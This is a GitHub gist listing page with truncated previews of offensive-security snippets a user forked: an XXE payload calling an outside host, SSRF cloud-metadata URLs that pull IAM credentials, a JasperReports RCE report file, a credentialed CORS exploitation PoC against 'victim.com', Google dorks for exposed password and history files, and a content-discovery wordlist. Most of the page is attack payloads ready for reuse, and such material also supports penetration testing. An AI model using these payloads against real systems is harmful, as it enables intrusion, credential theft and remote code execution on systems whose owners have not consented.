Skip to content

Instantly share code, notes, and snippets.

View shahid1996's full-sized avatar

shahid1996

5 followers · 3 following
View GitHub Profile
@shahid1996
shahid1996 / XXE_payloads
Created November 15, 2018 15:12 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@shahid1996
shahid1996 / cloud_metadata.txt
Created November 29, 2018 16:54 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
@shahid1996
shahid1996 / S2_Jasper_RCE.jrxml
Created December 7, 2018 14:47 — forked from v-p-b/S2_Jasper_RCE.jrxml
JasperReports Remote Code Execution with a single .JRXML file
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE jasperReport PUBLIC "-//JasperReports//DTD Report Design//EN" "http://jasperreports.sourceforge.net/dtds/jasperreport.dtd">
<jasperReport name="FirstJasper" columnCount="2" pageWidth="595" pageHeight="842" columnWidth="270" columnSpacing="15" leftMargin="20" rightMargin="20" topMargin="30" bottomMargin="30">
<style name="Arial_Normal" isDefault="true" fontName="Arial" fontSize="8" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Arial_Bold" isDefault="false" fontName="Arial" fontSize="8" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Bold" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Arial_Italic" isDefault="false" fontName="Arial" fontSize="8" isBold="false" isItalic="true" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Oblique" pdfEncoding="Cp1252" isPdfEmbedded="fa
@shahid1996
shahid1996 / cors misconfigurations poc
Created January 31, 2019 12:49 — forked from langu-private/cors misconfigurations poc
<html>
<title>cors misconfigurations poc</title>
<!-- reflect_origin -->
<script>var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://victim.com', true);
req.withCredentials = true;
req.send('{}');
function reqListener() {
alert(this.responseText);
@shahid1996
shahid1996 / scan.py
Created February 6, 2019 04:36 — forked from rudrasingh99/scan.py
Scan multiple platform for hosts.
#! /usr/bin/env python3
import requests
import re , os
from shodan import Shodan
datalist = []
class Binaryhost():
@shahid1996
shahid1996 / xml-attacks.md
Created March 8, 2019 09:46 — forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.

@shahid1996
shahid1996 / google-dorks
Created March 21, 2019 05:12 — forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@shahid1996
shahid1996 / txt.txt
Created March 21, 2019 05:12 — forked from wookiecooking/txt.txt
haha google dork searches
intitle:index.of .bash_history
intitle:index.of .sh_history
intitle:”Index of” index.html.bak
intitle:”Index of” index.php.bak
intitle:”Index of” index.jsp.bak
intitle:”Index of” “.htpasswd” htpasswd.bak
inurl:backup intitle:index.of inurl:admin
“Index of /backup”
intitle:”Index of” index.html~
intitle:”Index of” index.php~
@shahid1996
shahid1996 / google-dorks
Created March 26, 2019 08:22 — forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@shahid1996
shahid1996 / content_discovery_all.txt
Created March 28, 2019 15:27 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
---